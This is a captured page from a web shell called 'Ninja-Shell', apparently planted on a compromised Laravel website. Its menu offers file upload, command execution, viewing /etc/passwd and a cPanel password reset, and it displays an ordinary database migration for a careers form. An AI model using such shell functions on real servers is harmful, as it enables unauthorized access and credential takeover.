{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: ///var/www/bfti-website//database/migrations/2024_04_03_052324_create_career_forms_table.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. */ public function up(): void { Schema::create('career_forms', function (Blueprint $table) { $table->id(); $table->string('name'); $table->string('email')->nullable(); $table->string('phone')->nullable(); $table->integer('career_id')->nullable(); $table->longText('address')->nullable(); $table->longText('message')->nullable(); $table->boolean('isRead')->default(false); $table->timestamps(); $table->softDeletes(); }); } /** * Reverse the migrations. */ public function down(): void { Schema::dropIfExists('career_forms'); } };
./Ninja\.